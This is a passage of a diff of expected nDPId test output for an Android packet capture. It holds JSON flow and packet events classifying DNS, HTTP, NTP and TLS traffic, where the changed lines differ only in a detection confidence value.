{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454867075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454867075,"pkt":"TGr2n\/YnxiwDYGpkCABFAADPTgIAAEARprrAqAIBwKgCEAA1ztkAu4V++6aBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABCKACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAACCAA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAVQAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEwAEEf01ycB\/AAEAAQAAABMABBH9NdA="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"} -00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} +00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454867244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454867244,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qTJAAEARDBvAqAIQwKgCAYvxADUAKg90oPQBAAABAAAAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAQ=="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1582454867284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1582454867284,"pkt":"TGr2n\/YnxiwDYGpkCABFAAB+z3oAAEARJZPAqAIBwKgCEAA1i\/EAapnsoPSBgAABAAQAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAcAMAAEAAQAAARgABNjvIwjADAABAAEAAAEYAATY7yMAwAwAAQABAAABGAAE2O8jBMAMAAEAAQAAARgABNjvIww="} -00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454867284,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.35.8"}} +00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454867284,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.35.8"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1582454867323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454867323,"pkt":"xiwDYGpkTGr2n\/YnCABFAABMoTdAAEAR2rnAqAIQ2O8jCLMnAHsAOGfAGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOH81o7jEm7M"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867323,"flow_last_seen":1582454867323,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454867323,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1582454867358,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454867358,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMa8oAAGcRKSfY7yMIwKgCEAB7sycAOKcPHAEA7AAAAAAAAAAMR09PR+H81tNW8KhI4fzWjuMSbszh\/NbTVvCoSeH81tNW8KhL"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1582454867637,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454867637,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqXVAAEARC9XAqAIQwKgCAYbsADUALQrUr3oBAAABAAAAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454867639,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867639,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRpSEAAEARUBnAqAIBwKgCEAA1huwAPTVyr3qBgAABAAEAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1582454867702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867702,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA840EAAHYGn1rY7yZ4wKgCEAG7gM7sufL\/TwqQbaAS6yANxQAAAgQFZAQCCAoG5BEl\/\/8zdQEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454867703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867703,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oxpAAEAG1YnAqAIQ2O8meIDOAbtPCpBt7LnzAIAQAVcmCAAAAQEICv\/\/M3kG5BEl"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1582454867723,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454867723,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqYtAAEARC7\/AqAIQwKgCAdY1ADUALYAStecBAAABAAAAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454867761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867761,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRO4cAAEARubPAqAIBwKgCEAA11jUAPbDuteeBgAABAAEAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARgABKzZFEo="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} 